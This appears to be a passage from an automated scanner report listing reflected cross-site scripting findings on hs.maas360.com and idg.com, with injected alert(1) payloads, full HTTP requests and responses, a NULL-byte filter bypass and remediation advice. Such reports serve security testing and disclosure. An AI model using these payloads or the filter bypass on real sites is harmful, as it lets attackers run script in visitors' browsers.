2.97. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9034b"><script>alert(1)</script>2067fc0dbd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9034b\"><script>alert(1)</script>2067fc0dbd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?9034b"><script>alert(1)</script>2067fc0dbd3=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:56:54 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Thu, 16 Dec 2010 14:56:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?9034b\"><script>alert(1)</script>2067fc0dbd3=1"/>
...[SNIP]...

2.98. http://idg.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf07"-alert(1)-"514680829c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?faf07"-alert(1)-"514680829c4=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?faf07"-alert(1)-"514680829c4=1");
} catch(err) {}</script>
...[SNIP]...

2.99. http://idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641dd"%3be72f5765b93 was submitted in the REST URL parameter 2. This input was echoed as 641dd";e72f5765b93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html641dd"%3be72f5765b93?openpage HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html641dd";e72f5765b93?openpage");
} catch(err) {}</script>
...[SNIP]...

2.100. http://idg.com/idgnetrssfeeds.nsf/html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793d"-alert(1)-"6a220bac59d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1");
} catch(err) {}</script>
...[SNIP]...

2.101. http://idg.com/idgnetrssfeeds.nsf/html [openpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of the openpage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfb4"-alert(1)-"de20b25edcb was submitted in the openpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb");
} catch(err) {}</script>
...[SNIP]...

2.102. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5bcd"%3b240f4a66d20 was submitted in the REST URL parameter 1. This input was echoed as f5bcd";240f4a66d20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf5bcd"%3b240f4a66d20/HomeNew.nsf/docs/Brands HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf5bcd";240f4a66d20/HomeNew.nsf/docs/Brands");
} catch(err) {}</script>
...[SNIP]...

2.103. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 616ac"%3b7e80440585b was submitted in the REST URL parameter 3. This input was echoed as 616ac";7e80440585b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs616ac"%3b7e80440585b/Brands HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs616ac";7e80440585b/Brands");
} catch(err) {}</script>
...[SNIP]...

2.104. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4c8"%3b7c6e698891a was submitted in the REST URL parameter 4. This input was echoed as 8d4c8";7c6e698891a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Brands8d4c8"%3b7c6e698891a HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands8d4c8";7c6e698891a");
} catch(err) {}</script>
...[SNIP]...

2.105. http://idg.com/www/HomeNew.nsf/docs/Brands [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5392"-alert(1)-"907c7a6363a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1");
} catch(err) {}</script>
...[SNIP]...

2.106. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3e6"%3b4e4e67dc4b8 was submitted in the REST URL parameter 1. This input was echoed as ac3e6";4e4e67dc4b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwac3e6"%3b4e4e67dc4b8/HomeNew.nsf/docs/FAQ HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwac3e6";4e4e67dc4b8/HomeNew.nsf/docs/FAQ");
} catch(err) {}</script>
...[SNIP]...

2.107. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ba3"%3bc63f355635b was submitted in the REST URL parameter 3. This input was echoed as 98ba3";c63f355635b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs98ba3"%3bc63f355635b/FAQ HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ba3";c63f355635b/FAQ");
} catch(err) {}</script>
...[SNIP]...

2.108. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca5b"%3b8da2a1ee7b7 was submitted in the REST URL parameter 4. This input was echoed as fca5b";8da2a1ee7b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/FAQfca5b"%3b8da2a1ee7b7 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQfca5b";8da2a1ee7b7");
} catch(err) {}</script>
...[SNIP]...

2.109. http://idg.com/www/HomeNew.nsf/docs/FAQ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fafea"-alert(1)-"067a0a1a13e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1");
} catch(err) {}</script>
...[SNIP]...

2.110. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24d1e"%3bdadbac10c59 was submitted in the REST URL parameter 1. This input was echoed as 24d1e";dadbac10c59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www24d1e"%3bdadbac10c59/HomeNew.nsf/docs/IDG_News HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www24d1e";dadbac10c59/HomeNew.nsf/docs/IDG_News");
} catch(err) {}</script>
...[SNIP]...

2.111. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f39"%3b63b032dcd9f was submitted in the REST URL parameter 3. This input was echoed as c5f39";63b032dcd9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsc5f39"%3b63b032dcd9f/IDG_News HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsc5f39";63b032dcd9f/IDG_News");
} catch(err) {}</script>
...[SNIP]...

